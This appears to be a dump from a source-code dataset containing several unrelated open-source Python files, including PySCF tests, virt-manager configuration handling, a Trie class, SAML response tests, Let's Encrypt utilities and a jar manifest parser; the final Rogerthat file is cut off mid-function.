repo_name
stringlengths 5
92
| path
stringlengths 4
232
| copies
stringclasses 19
values | size
stringlengths 4
7
| content
stringlengths 721
1.04M
| license
stringclasses 15
values | hash
int64 -9,223,277,421,539,062,000
9,223,102,107B
| line_mean
float64 6.51
99.9
| line_max
int64 15
997
| alpha_frac
float64 0.25
0.97
| autogenerated
bool 1
class |
---|---|---|---|---|---|---|---|---|---|---|
sunqm/pyscf | pyscf/eph/test/test_uhf.py | 1 | 2089 | #!/usr/bin/env python
# Copyright 2014-2020 The PySCF Developers. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from pyscf import scf, gto
from pyscf.eph import eph_fd, uhf
import numpy as np
import unittest
mol = gto.M()
mol.atom = [['O', [0.000000000000, -0.000000000775, 0.923671924285]],
['H', [-0.000000000000, -1.432564848017, 2.125164039823]],
['H', [0.000000000000, 1.432564848792, 2.125164035930]]]
mol.unit = 'Bohr'
mol.basis = 'sto3g'
mol.verbose=4
mol.build() # this is a pre-computed relaxed geometry
class KnownValues(unittest.TestCase):
def test_finite_diff_uhf_eph(self):
mf = scf.UHF(mol)
mf.conv_tol = 1e-16
mf.conv_tol_grad = 1e-10
mf.kernel()
grad = mf.nuc_grad_method().kernel()
self.assertTrue(abs(grad).max()<1e-5)
mat, omega = eph_fd.kernel(mf)
matmo, _ = eph_fd.kernel(mf, mo_rep=True)
myeph = uhf.EPH(mf)
eph, _ = myeph.kernel()
ephmo, _ = myeph.kernel(mo_rep=True)
for i in range(len(omega)):
self.assertTrue(min(np.linalg.norm(eph[:,i]-mat[:,i]),np.linalg.norm(eph[:,i]+mat[:,i]))<1e-5)
self.assertTrue(min(abs(eph[:,i]-mat[:,i]).max(), abs(eph[:,i]+mat[:,i]).max())<1e-5)
self.assertTrue(min(np.linalg.norm(ephmo[:,i]-matmo[:,i]),np.linalg.norm(ephmo[:,i]+matmo[:,i]))<1e-5)
self.assertTrue(min(abs(ephmo[:,i]-matmo[:,i]).max(), abs(ephmo[:,i]+matmo[:,i]).max())<1e-5)
if __name__ == '__main__':
print("Full Tests for UHF")
unittest.main()
| apache-2.0 | -3,297,742,572,155,970,000 | 36.981818 | 114 | 0.632839 | false |
noskill/virt-manager | virtManager/config.py | 1 | 25087 | #
# Copyright (C) 2006, 2012-2014 Red Hat, Inc.
# Copyright (C) 2006 Daniel P. Berrange <[email protected]>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,
# MA 02110-1301 USA.
#
import os
import logging
from gi.repository import Gio
from gi.repository import GLib
from gi.repository import Gtk
from virtinst import CPU
from .keyring import vmmKeyring, vmmSecret
running_config = None
class SettingsWrapper(object):
def __init__(self, settings_id):
self._root = settings_id
self._settings = Gio.Settings.new(self._root)
self._settingsmap = {"": self._settings}
self._handler_map = {}
for child in self._settings.list_children():
childschema = self._root + "." + child
self._settingsmap[child] = Gio.Settings.new(childschema)
def _parse_key(self, key):
value = key.strip("/")
settingskey = ""
if "/" in value:
settingskey, value = value.rsplit("/", 1)
return settingskey, value
def make_vm_settings(self, key):
settingskey = self._parse_key(key)[0]
if settingskey in self._settingsmap:
return True
schema = self._root + ".vm"
path = "/" + self._root.replace(".", "/") + key.rsplit("/", 1)[0] + "/"
self._settingsmap[settingskey] = Gio.Settings.new_with_path(schema,
path)
return True
def _find_settings(self, key):
settingskey, value = self._parse_key(key)
return self._settingsmap[settingskey], value
def _cmd_helper(self, cmd, key, *args, **kwargs):
settings, key = self._find_settings(key)
return getattr(settings, cmd)(key, *args, **kwargs)
def notify_add(self, key, cb, *args, **kwargs):
settings, key = self._find_settings(key)
def wrapcb(*ignore):
return cb(*args, **kwargs)
ret = settings.connect("changed::%s" % key, wrapcb, *args, **kwargs)
self._handler_map[ret] = settings
return ret
def notify_remove(self, h):
settings = self._handler_map.pop(h)
return settings.disconnect(h)
def get(self, key):
return self._cmd_helper("get_value", key).unpack()
def set(self, key, value, *args, **kwargs):
fmt = self._cmd_helper("get_value", key).get_type_string()
return self._cmd_helper("set_value", key,
GLib.Variant(fmt, value),
*args, **kwargs)
class vmmConfig(object):
# key names for saving last used paths
CONFIG_DIR_IMAGE = "image"
CONFIG_DIR_ISO_MEDIA = "isomedia"
CONFIG_DIR_FLOPPY_MEDIA = "floppymedia"
CONFIG_DIR_SAVE = "save"
CONFIG_DIR_RESTORE = "restore"
CONFIG_DIR_SCREENSHOT = "screenshot"
CONFIG_DIR_FS = "fs"
# Metadata mapping for browse types. Prob shouldn't go here, but works
# for now.
browse_reason_data = {
CONFIG_DIR_IMAGE : {
"enable_create" : True,
"storage_title" : _("Locate or create storage volume"),
"local_title" : _("Locate existing storage"),
"dialog_type" : Gtk.FileChooserAction.SAVE,
"choose_button" : Gtk.STOCK_OPEN,
},
CONFIG_DIR_ISO_MEDIA : {
"enable_create" : False,
"storage_title" : _("Locate ISO media volume"),
"local_title" : _("Locate ISO media"),
},
CONFIG_DIR_FLOPPY_MEDIA : {
"enable_create" : False,
"storage_title" : _("Locate floppy media volume"),
"local_title" : _("Locate floppy media"),
},
CONFIG_DIR_FS : {
"enable_create" : False,
"storage_title" : _("Locate directory volume"),
"local_title" : _("Locate directory volume"),
"dialog_type" : Gtk.FileChooserAction.SELECT_FOLDER,
},
}
CONSOLE_SCALE_NEVER = 0
CONSOLE_SCALE_FULLSCREEN = 1
CONSOLE_SCALE_ALWAYS = 2
DEFAULT_XEN_IMAGE_DIR = "/var/lib/xen/images"
DEFAULT_XEN_SAVE_DIR = "/var/lib/xen/dump"
DEFAULT_VIRT_IMAGE_DIR = "/var/lib/libvirt/images"
DEFAULT_VIRT_SAVE_DIR = "/var/lib/libvirt"
def __init__(self, appname, cliconfig, test_first_run=False):
self.appname = appname
self.appversion = cliconfig.__version__
self.conf_dir = "/org/virt-manager/%s/" % self.appname
self.ui_dir = os.path.join(cliconfig.asset_dir, "ui")
self.test_first_run = bool(test_first_run)
self.conf = SettingsWrapper("org.virt-manager.virt-manager")
# We don't create it straight away, since we don't want
# to block the app pending user authorization to access
# the keyring
self.keyring = None
self.default_qemu_user = cliconfig.default_qemu_user
self.stable_defaults = cliconfig.stable_defaults
self.preferred_distros = cliconfig.preferred_distros
self.hv_packages = cliconfig.hv_packages
self.libvirt_packages = cliconfig.libvirt_packages
self.askpass_package = cliconfig.askpass_package
self.default_graphics_from_config = cliconfig.default_graphics
self.with_bhyve = cliconfig.with_bhyve
self.cli_usbredir = None
self.default_storage_format_from_config = "qcow2"
self.cpu_default_from_config = "host-cpu-model"
self.default_console_resizeguest = 0
self.default_add_spice_usbredir = "yes"
self._objects = []
self.support_inspection = self.check_inspection()
self._spice_error = None
global running_config
running_config = self
def check_inspection(self):
try:
# Check we can open the Python guestfs module.
from guestfs import GuestFS # pylint: disable=import-error
GuestFS(close_on_exit=False)
return True
except:
return False
# General app wide helpers (gsettings agnostic)
def get_appname(self):
return self.appname
def get_appversion(self):
return self.appversion
def get_ui_dir(self):
return self.ui_dir
def embeddable_graphics(self):
ret = ["vnc", "spice"]
return ret
def remove_notifier(self, h):
self.conf.notify_remove(h)
# Used for debugging reference leaks, we keep track of all objects
# come and go so we can do a leak report at app shutdown
def add_object(self, obj):
self._objects.append(obj)
def remove_object(self, obj):
self._objects.remove(obj)
def get_objects(self):
return self._objects[:]
def _make_pervm_key(self, uuid, key):
return "/vms/%s%s" % (uuid.replace("-", ""), key)
def listen_pervm(self, uuid, key, *args, **kwargs):
key = self._make_pervm_key(uuid, key)
self.conf.make_vm_settings(key)
return self.conf.notify_add(key, *args, **kwargs)
def set_pervm(self, uuid, key, *args, **kwargs):
key = self._make_pervm_key(uuid, key)
self.conf.make_vm_settings(key)
ret = self.conf.set(key, *args, **kwargs)
return ret
def get_pervm(self, uuid, key):
key = self._make_pervm_key(uuid, key)
self.conf.make_vm_settings(key)
return self.conf.get(key)
###################
# General helpers #
###################
# Manager stats view preferences
def is_vmlist_guest_cpu_usage_visible(self):
return self.conf.get("/vmlist-fields/cpu-usage")
def is_vmlist_host_cpu_usage_visible(self):
return self.conf.get("/vmlist-fields/host-cpu-usage")
def is_vmlist_memory_usage_visible(self):
return self.conf.get("/vmlist-fields/memory-usage")
def is_vmlist_disk_io_visible(self):
return self.conf.get("/vmlist-fields/disk-usage")
def is_vmlist_network_traffic_visible(self):
return self.conf.get("/vmlist-fields/network-traffic")
def set_vmlist_guest_cpu_usage_visible(self, state):
self.conf.set("/vmlist-fields/cpu-usage", state)
def set_vmlist_host_cpu_usage_visible(self, state):
self.conf.set("/vmlist-fields/host-cpu-usage", state)
def set_vmlist_memory_usage_visible(self, state):
self.conf.set("/vmlist-fields/memory-usage", state)
def set_vmlist_disk_io_visible(self, state):
self.conf.set("/vmlist-fields/disk-usage", state)
def set_vmlist_network_traffic_visible(self, state):
self.conf.set("/vmlist-fields/network-traffic", state)
def on_vmlist_guest_cpu_usage_visible_changed(self, cb):
return self.conf.notify_add("/vmlist-fields/cpu-usage", cb)
def on_vmlist_host_cpu_usage_visible_changed(self, cb):
return self.conf.notify_add("/vmlist-fields/host-cpu-usage", cb)
def on_vmlist_memory_usage_visible_changed(self, cb):
return self.conf.notify_add("/vmlist-fields/memory-usage", cb)
def on_vmlist_disk_io_visible_changed(self, cb):
return self.conf.notify_add("/vmlist-fields/disk-usage", cb)
def on_vmlist_network_traffic_visible_changed(self, cb):
return self.conf.notify_add("/vmlist-fields/network-traffic", cb)
# Keys preferences
def get_keys_combination(self):
ret = self.conf.get("/console/grab-keys")
if not ret:
# Left Control + Left Alt
return "65507,65513"
return ret
def set_keys_combination(self, val):
# Val have to be a list of integers
val = ','.join([str(v) for v in val])
self.conf.set("/console/grab-keys", val)
def on_keys_combination_changed(self, cb):
return self.conf.notify_add("/console/grab-keys", cb)
# This key is not intended to be exposed in the UI yet
def get_keyboard_grab_default(self):
return self.conf.get("/console/grab-keyboard")
def set_keyboard_grab_default(self, val):
self.conf.set("/console/grab-keyboard", val)
def on_keyboard_grab_default_changed(self, cb):
return self.conf.notify_add("/console/grab-keyboard", cb)
# Confirmation preferences
def get_confirm_forcepoweroff(self):
return self.conf.get("/confirm/forcepoweroff")
def get_confirm_poweroff(self):
return self.conf.get("/confirm/poweroff")
def get_confirm_pause(self):
return self.conf.get("/confirm/pause")
def get_confirm_removedev(self):
return self.conf.get("/confirm/removedev")
def get_confirm_interface(self):
return self.conf.get("/confirm/interface-power")
def get_confirm_unapplied(self):
return self.conf.get("/confirm/unapplied-dev")
def get_confirm_delstorage(self):
return self.conf.get("/confirm/delete-storage")
def set_confirm_forcepoweroff(self, val):
self.conf.set("/confirm/forcepoweroff", val)
def set_confirm_poweroff(self, val):
self.conf.set("/confirm/poweroff", val)
def set_confirm_pause(self, val):
self.conf.set("/confirm/pause", val)
def set_confirm_removedev(self, val):
self.conf.set("/confirm/removedev", val)
def set_confirm_interface(self, val):
self.conf.set("/confirm/interface-power", val)
def set_confirm_unapplied(self, val):
self.conf.set("/confirm/unapplied-dev", val)
def set_confirm_delstorage(self, val):
self.conf.set("/confirm/delete-storage", val)
# System tray visibility
def on_view_system_tray_changed(self, cb):
return self.conf.notify_add("/system-tray", cb)
def get_view_system_tray(self):
return self.conf.get("/system-tray")
def set_view_system_tray(self, val):
self.conf.set("/system-tray", val)
# Stats history and interval length
def get_stats_history_length(self):
return 120
def get_stats_update_interval(self):
interval = self.conf.get("/stats/update-interval")
if interval < 1:
return 1
return interval
def set_stats_update_interval(self, interval):
self.conf.set("/stats/update-interval", interval)
def on_stats_update_interval_changed(self, cb):
return self.conf.notify_add("/stats/update-interval", cb)
# Disable/Enable different stats polling
def get_stats_enable_cpu_poll(self):
return self.conf.get("/stats/enable-cpu-poll")
def get_stats_enable_disk_poll(self):
return self.conf.get("/stats/enable-disk-poll")
def get_stats_enable_net_poll(self):
return self.conf.get("/stats/enable-net-poll")
def get_stats_enable_memory_poll(self):
return self.conf.get("/stats/enable-memory-poll")
def set_stats_enable_cpu_poll(self, val):
self.conf.set("/stats/enable-cpu-poll", val)
def set_stats_enable_disk_poll(self, val):
self.conf.set("/stats/enable-disk-poll", val)
def set_stats_enable_net_poll(self, val):
self.conf.set("/stats/enable-net-poll", val)
def set_stats_enable_memory_poll(self, val):
self.conf.set("/stats/enable-memory-poll", val)
def on_stats_enable_cpu_poll_changed(self, cb, row=None):
return self.conf.notify_add("/stats/enable-cpu-poll", cb, row)
def on_stats_enable_disk_poll_changed(self, cb, row=None):
return self.conf.notify_add("/stats/enable-disk-poll", cb, row)
def on_stats_enable_net_poll_changed(self, cb, row=None):
return self.conf.notify_add("/stats/enable-net-poll", cb, row)
def on_stats_enable_memory_poll_changed(self, cb, row=None):
return self.conf.notify_add("/stats/enable-memory-poll", cb, row)
# VM Console preferences
def on_console_accels_changed(self, cb):
return self.conf.notify_add("/console/enable-accels", cb)
def get_console_accels(self):
console_pref = self.conf.get("/console/enable-accels")
if console_pref is None:
console_pref = False
return console_pref
def set_console_accels(self, pref):
self.conf.set("/console/enable-accels", pref)
def on_console_scaling_changed(self, cb):
return self.conf.notify_add("/console/scaling", cb)
def get_console_scaling(self):
return self.conf.get("/console/scaling")
def set_console_scaling(self, pref):
self.conf.set("/console/scaling", pref)
def on_console_resizeguest_changed(self, cb):
return self.conf.notify_add("/console/resize-guest", cb)
def get_console_resizeguest(self):
val = self.conf.get("/console/resize-guest")
if val == -1:
val = self.default_console_resizeguest
return val
def set_console_resizeguest(self, pref):
self.conf.set("/console/resize-guest", pref)
def get_auto_redirection(self):
if self.cli_usbredir is not None:
return self.cli_usbredir
return self.conf.get("/console/auto-redirect")
def set_auto_redirection(self, state):
self.conf.set("/console/auto-redirect", state)
# Show VM details toolbar
def get_details_show_toolbar(self):
res = self.conf.get("/details/show-toolbar")
if res is None:
res = True
return res
def set_details_show_toolbar(self, state):
self.conf.set("/details/show-toolbar", state)
# VM details default size
def get_details_window_size(self):
w = self.conf.get("/details/window_width")
h = self.conf.get("/details/window_height")
return (w, h)
def set_details_window_size(self, w, h):
self.conf.set("/details/window_width", w)
self.conf.set("/details/window_height", h)
# New VM preferences
def get_new_vm_sound(self):
return self.conf.get("/new-vm/add-sound")
def set_new_vm_sound(self, state):
self.conf.set("/new-vm/add-sound", state)
def get_graphics_type(self, raw=False):
ret = self.conf.get("/new-vm/graphics-type")
if ret not in ["system", "vnc", "spice"]:
ret = "system"
if ret == "system" and not raw:
return self.default_graphics_from_config
return ret
def set_graphics_type(self, gtype):
self.conf.set("/new-vm/graphics-type", gtype.lower())
def get_add_spice_usbredir(self, raw=False):
ret = self.conf.get("/new-vm/add-spice-usbredir")
if ret not in ["system", "yes", "no"]:
ret = "system"
if not raw and not self.get_graphics_type() == "spice":
return "no"
if ret == "system" and not raw:
return self.default_add_spice_usbredir
return ret
def set_add_spice_usbredir(self, val):
self.conf.set("/new-vm/add-spice-usbredir", val)
def get_default_storage_format(self, raw=False):
ret = self.conf.get("/new-vm/storage-format")
if ret not in ["default", "raw", "qcow2"]:
ret = "default"
if ret == "default" and not raw:
return self.default_storage_format_from_config
return ret
def set_storage_format(self, typ):
self.conf.set("/new-vm/storage-format", typ.lower())
def get_default_cpu_setting(self, raw=False, for_cpu=False):
ret = self.conf.get("/new-vm/cpu-default")
whitelist = [CPU.SPECIAL_MODE_HOST_MODEL_ONLY,
CPU.SPECIAL_MODE_HOST_MODEL,
CPU.SPECIAL_MODE_HV_DEFAULT]
if ret not in whitelist:
ret = "default"
if ret == "default" and not raw:
ret = self.cpu_default_from_config
if ret not in whitelist:
ret = whitelist[0]
if for_cpu and ret == CPU.SPECIAL_MODE_HOST_MODEL:
# host-model has known issues, so use our 'copy cpu'
# behavior until host-model does what we need
ret = CPU.SPECIAL_MODE_HOST_COPY
return ret
def set_default_cpu_setting(self, val):
self.conf.set("/new-vm/cpu-default", val.lower())
# URL/Media path history
def _url_add_helper(self, gsettings_path, url):
maxlength = 10
urls = self.conf.get(gsettings_path)
if urls is None:
urls = []
if urls.count(url) == 0 and len(url) > 0 and not url.isspace():
# The url isn't already in the list, so add it
urls.insert(0, url)
if len(urls) > maxlength:
del urls[len(urls) - 1]
self.conf.set(gsettings_path, urls)
def add_media_url(self, url):
self._url_add_helper("/urls/urls", url)
def add_kickstart_url(self, url):
self._url_add_helper("/urls/kickstarts", url)
def add_iso_path(self, path):
self._url_add_helper("/urls/isos", path)
def get_media_urls(self):
return self.conf.get("/urls/urls")
def get_kickstart_urls(self):
return self.conf.get("/urls/kickstarts")
def get_iso_paths(self):
return self.conf.get("/urls/isos")
# Whether to ask about fixing path permissions
def add_perms_fix_ignore(self, pathlist):
current_list = self.get_perms_fix_ignore() or []
for path in pathlist:
if path in current_list:
continue
current_list.append(path)
self.conf.set("/paths/perms-fix-ignore", current_list)
def get_perms_fix_ignore(self):
return self.conf.get("/paths/perms-fix-ignore")
# Manager view connection list
def add_conn(self, uri):
if self.test_first_run:
return
uris = self.conf.get("/connections/uris")
if uris is None:
uris = []
if uris.count(uri) == 0:
uris.insert(len(uris) - 1, uri)
self.conf.set("/connections/uris", uris)
def remove_conn(self, uri):
uris = self.conf.get("/connections/uris")
if uris is None:
return
if uris.count(uri) != 0:
uris.remove(uri)
self.conf.set("/connections/uris", uris)
if self.get_conn_autoconnect(uri):
uris = self.conf.get("/connections/autoconnect")
uris.remove(uri)
self.conf.set("/connections/autoconnect", uris)
def get_conn_uris(self):
if self.test_first_run:
return []
return self.conf.get("/connections/uris")
# Manager default window size
def get_manager_window_size(self):
w = self.conf.get("/manager-window-width")
h = self.conf.get("/manager-window-height")
return (w, h)
def set_manager_window_size(self, w, h):
self.conf.set("/manager-window-width", w)
self.conf.set("/manager-window-height", h)
# URI autoconnect
def get_conn_autoconnect(self, uri):
uris = self.conf.get("/connections/autoconnect")
return ((uris is not None) and (uri in uris))
def set_conn_autoconnect(self, uri, val):
if self.test_first_run:
return
uris = self.conf.get("/connections/autoconnect")
if uris is None:
uris = []
if not val and uri in uris:
uris.remove(uri)
elif val and uri not in uris:
uris.append(uri)
self.conf.set("/connections/autoconnect", uris)
# Default directory location dealings
def _get_default_dir_key(self, _type):
if (_type in [self.CONFIG_DIR_ISO_MEDIA,
self.CONFIG_DIR_FLOPPY_MEDIA]):
return "media"
if (_type in [self.CONFIG_DIR_IMAGE,
self.CONFIG_DIR_SCREENSHOT]):
return _type
return None
def get_default_directory(self, conn, _type):
key = self._get_default_dir_key(_type)
path = None
if key:
path = self.conf.get("/paths/%s-default" % key)
if not path:
if (_type == self.CONFIG_DIR_IMAGE or
_type == self.CONFIG_DIR_ISO_MEDIA or
_type == self.CONFIG_DIR_FLOPPY_MEDIA):
path = self.get_default_image_dir(conn)
if (_type == self.CONFIG_DIR_SAVE or
_type == self.CONFIG_DIR_RESTORE):
path = self.get_default_save_dir(conn)
logging.debug("directory for type=%s returning=%s", _type, path)
return path
def set_default_directory(self, folder, _type):
key = self._get_default_dir_key(_type)
if not key:
return
logging.debug("saving directory for type=%s to %s", key, folder)
self.conf.set("/paths/%s-default" % key, folder)
def get_default_image_dir(self, conn):
if conn.is_xen():
return self.DEFAULT_XEN_IMAGE_DIR
if (conn.is_qemu_session() or
not os.access(self.DEFAULT_VIRT_IMAGE_DIR, os.W_OK)):
return os.getcwd()
# Just return the default dir since the intention is that it
# is a managed pool and the user will be able to install to it.
return self.DEFAULT_VIRT_IMAGE_DIR
def get_default_save_dir(self, conn):
if conn.is_xen():
return self.DEFAULT_XEN_SAVE_DIR
elif os.access(self.DEFAULT_VIRT_SAVE_DIR, os.W_OK):
return self.DEFAULT_VIRT_SAVE_DIR
else:
return os.getcwd()
# Keyring / VNC password dealings
def get_secret_name(self, vm):
return "vm-console-" + vm.get_uuid()
def has_keyring(self):
if self.keyring is None:
self.keyring = vmmKeyring()
return self.keyring.is_available()
def get_console_password(self, vm):
if not self.has_keyring():
return ("", "")
username, keyid = vm.get_console_password()
if keyid == -1:
return ("", "")
secret = self.keyring.get_secret(keyid)
if secret is None or secret.get_name() != self.get_secret_name(vm):
return ("", "")
if (secret.attributes.get("hvuri", None) != vm.conn.get_uri() or
secret.attributes.get("uuid", None) != vm.get_uuid()):
return ("", "")
return (secret.get_secret(), username or "")
def set_console_password(self, vm, password, username=""):
if not self.has_keyring():
return
secret = vmmSecret(self.get_secret_name(vm), password,
{"uuid" : vm.get_uuid(),
"hvuri": vm.conn.get_uri()})
keyid = self.keyring.add_secret(secret)
if keyid is None:
return
vm.set_console_password(username, keyid)
| gpl-2.0 | -5,542,892,643,271,892,000 | 35.148415 | 79 | 0.604775 | false |
armsky/Algorithms | Data Structure/trie.py | 1 | 1534 | class TrieNode:
# Initialize your data structure here.
def __init__(self):
self.children = {}
self.is_word = False
class Trie:
def __init__(self):
self.root = TrieNode()
# @param {string} word
# @return {void}
# Inserts a word into the trie.
def insert(self, word):
if word:
node = self.root
for char in word:
child = node.children.get(char)
if not child:
child = TrieNode()
node.children[char] = child
node = child
node.is_word = True
# @param {string} word
# @return {boolean}
# Returns if the word is in the trie.
def search(self, word):
if word:
node = self.root
for char in word:
if char not in node.children:
return False
node = node.children[char]
return node.is_word
else:
return False
# @param {string} prefix
# @return {boolean}
# Returns if there is any word in the trie
# that starts with the given prefix.
def startsWith(self, prefix):
if prefix:
node = self.root
for char in prefix:
if char not in node.children:
return False
node = node.children[char]
return True
return False
trie = Trie()
trie.insert("a")
trie.insert("ab")
print trie.search("a")
print trie.search("ab")
| apache-2.0 | -8,049,908,019,752,421,000 | 25.448276 | 47 | 0.508475 | false |
onelogin/python3-saml | tests/src/OneLogin/saml2_tests/signed_response_test.py | 1 | 2007 | # -*- coding: utf-8 -*-
# Copyright (c) 2010-2021 OneLogin, Inc.
# MIT License
import json
from os.path import dirname, join, exists
import unittest
from onelogin.saml2.response import OneLogin_Saml2_Response
from onelogin.saml2.settings import OneLogin_Saml2_Settings
from onelogin.saml2.utils import OneLogin_Saml2_Utils
class OneLogin_Saml2_SignedResponse_Test(unittest.TestCase):
data_path = join(dirname(__file__), '..', '..', '..', 'data')
def loadSettingsJSON(self):
filename = join(dirname(__file__), '..', '..', '..', 'settings', 'settings1.json')
if exists(filename):
stream = open(filename, 'r')
settings = json.load(stream)
stream.close()
return settings
else:
raise Exception('Settings json file does not exist')
def file_contents(self, filename):
f = open(filename, 'r')
content = f.read()
f.close()
return content
def testResponseSignedAssertionNot(self):
"""
Tests the getNameId method of the OneLogin_Saml2_Response
Case valid signed response, unsigned assertion
"""
settings = OneLogin_Saml2_Settings(self.loadSettingsJSON())
message = self.file_contents(join(self.data_path, 'responses', 'open_saml_response.xml'))
response = OneLogin_Saml2_Response(settings, OneLogin_Saml2_Utils.b64encode(message))
self.assertEqual('[email protected]', response.get_nameid())
def testResponseAndAssertionSigned(self):
"""
Tests the getNameId method of the OneLogin_Saml2_Response
Case valid signed response, signed assertion
"""
settings = OneLogin_Saml2_Settings(self.loadSettingsJSON())
message = self.file_contents(join(self.data_path, 'responses', 'simple_saml_php.xml'))
response = OneLogin_Saml2_Response(settings, OneLogin_Saml2_Utils.b64encode(message))
self.assertEqual('[email protected]', response.get_nameid())
| mit | -5,244,504,662,315,447,000 | 36.166667 | 97 | 0.658196 | false |
felixrieseberg/lets-encrypt-preview | letsencrypt/le_util.py | 1 | 2392 | """Utilities for all Let's Encrypt."""
import collections
import errno
import os
import stat
from letsencrypt import errors
Key = collections.namedtuple("Key", "file pem")
# Note: form is the type of data, "pem" or "der"
CSR = collections.namedtuple("CSR", "file data form")
def make_or_verify_dir(directory, mode=0o755, uid=0):
"""Make sure directory exists with proper permissions.
:param str directory: Path to a directory.
:param int mode: Directory mode.
:param int uid: Directory owner.
:raises LetsEncryptClientError: if a directory already exists,
but has wrong permissions or owner
:raises OSError: if invalid or inaccessible file names and
paths, or other arguments that have the correct type,
but are not accepted by the operating system.
"""
try:
os.makedirs(directory, mode)
except OSError as exception:
if exception.errno == errno.EEXIST:
if not check_permissions(directory, mode, uid):
raise errors.LetsEncryptClientError(
"%s exists, but does not have the proper "
"permissions or owner" % directory)
else:
raise
def check_permissions(filepath, mode, uid=0):
"""Check file or directory permissions.
:param str filepath: Path to the tested file (or directory).
:param int mode: Expected file mode.
:param int uid: Expected file owner.
:returns: True if `mode` and `uid` match, False otherwise.
:rtype: bool
"""
file_stat = os.stat(filepath)
return stat.S_IMODE(file_stat.st_mode) == mode and file_stat.st_uid == uid
def unique_file(path, mode=0o777):
"""Safely finds a unique file for writing only (by default).
:param str path: path/filename.ext
:param int mode: File mode
:return: tuple of file object and file name
"""
path, tail = os.path.split(path)
count = 0
while True:
fname = os.path.join(path, "%04d_%s" % (count, tail))
try:
file_d = os.open(fname, os.O_CREAT | os.O_EXCL | os.O_RDWR, mode)
return os.fdopen(file_d, "w"), fname
except OSError:
pass
count += 1
def safely_remove(path):
"""Remove a file that may not exist."""
try:
os.remove(path)
except OSError as err:
if err.errno != errno.ENOENT:
raise
| apache-2.0 | 6,374,653,857,685,918,000 | 27.47619 | 78 | 0.629599 | false |
salimfadhley/jenkinsapi | jenkinsapi/utils/manifest.py | 3 | 3306 | """
This module enables Manifest file parsing.
Copied from
https://chromium.googlesource.com/external/googleappengine/python/+/master
/google/appengine/tools/jarfile.py
"""
import zipfile
_MANIFEST_NAME = 'META-INF/MANIFEST.MF'
class InvalidJarError(Exception):
"""
InvalidJar exception class
"""
pass
class Manifest(object):
"""The parsed manifest from a jar file.
Attributes:
main_section: a dict representing the main (first)
section of the manifest.
Each key is a string that is an attribute, such as
'Manifest-Version', and the corresponding value is a string that
is the value of the attribute, such as '1.0'.
sections: a dict representing the other sections of the manifest.
Each key is a string that is the value of the 'Name' attribute for
the section, and the corresponding value is a dict like the
main_section one, for the other attributes.
"""
def __init__(self, main_section, sections):
self.main_section = main_section
self.sections = sections
def read_manifest(jar_file_name):
"""Read and parse the manifest out of the given jar.
Args:
jar_file_name: the name of the jar from which the manifest is to be read.
Returns:
A parsed Manifest object, or None if the jar has no manifest.
Raises:
IOError: if the jar does not exist or cannot be read.
"""
with zipfile.ZipFile(jar_file_name) as jar:
try:
manifest_string = jar.read(_MANIFEST_NAME).decode('UTF-8')
except KeyError:
return None
return _parse_manifest(manifest_string)
def _parse_manifest(manifest_string):
"""Parse a Manifest object out of the given string.
Args:
manifest_string: a str or unicode that is the manifest contents.
Returns:
A Manifest object parsed out of the string.
Raises:
InvalidJarError: if the manifest is not well-formed.
"""
manifest_string = '\n'.join(manifest_string.splitlines()).rstrip('\n')
section_strings = manifest_string.split('\n\n')
parsed_sections = [_parse_manifest_section(s) for s in section_strings]
main_section = parsed_sections[0]
sections = dict()
try:
for entry in parsed_sections[1:]:
sections[entry['Name']] = entry
except KeyError:
raise InvalidJarError(
'Manifest entry has no Name attribute: %s' % entry)
return Manifest(main_section, sections)
def _parse_manifest_section(section):
"""Parse a dict out of the given manifest section string.
Args:
section: a str or unicode that is the manifest section.
It looks something like this (without the >):
> Name: section-name
> Some-Attribute: some value
> Another-Attribute: another value
Returns:
A dict where the keys are the attributes (here, 'Name', 'Some-Attribute',
'Another-Attribute'), and the values are the corresponding
attribute values.
Raises:
InvalidJarError: if the manifest section is not well-formed.
"""
section = section.replace('\n ', '')
try:
return dict(line.split(': ', 1) for line in section.split('\n'))
except ValueError:
raise InvalidJarError('Invalid manifest %r' % section)
| mit | -2,833,017,234,510,234,000 | 33.082474 | 79 | 0.659407 | false |
rogerthat-platform/rogerthat-backend | src/rogerthat/templates/__init__.py | 1 | 3596 | # -*- coding: utf-8 -*-
# Copyright 2017 GIG Technology NV
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# @@license_version:1.3@@
import logging
import os
from rogerthat import consts
from rogerthat.settings import get_server_settings
from rogerthat.templates.jinja_extensions import TranslateExtension
from rogerthat.translations import DEFAULT_LANGUAGE
from google.appengine.ext.webapp import template
import jinja2
from mcfw.rpc import returns, arguments
TEMPLATES_DIR = os.path.dirname(__file__)
_SUPPORTED_LANGUAGES = [d for d in os.listdir(TEMPLATES_DIR) if os.path.isdir(os.path.join(TEMPLATES_DIR, d))]
_CONSTS = dict(((name, getattr(consts, name)) for name in dir(consts) if name.upper() == name))
JINJA_ENVIRONMENT = jinja2.Environment(loader=jinja2.FileSystemLoader([os.path.join(os.path.dirname(__file__))]),
extensions=[TranslateExtension])
@returns(unicode)
@arguments(template_name=str, languages=[str], variables=dict, category=unicode)
def render(template_name, languages, variables, category=""):
logging.info("Rendering %s for languages %s" % (template_name, languages))
variables = dict(variables)
variables.update(_CONSTS)
variables["BASE_URL"] = get_server_settings().baseUrl
variables["INCLUDE_ROGERTHAT_DOT_NET"] = True
if not languages:
languages = list()
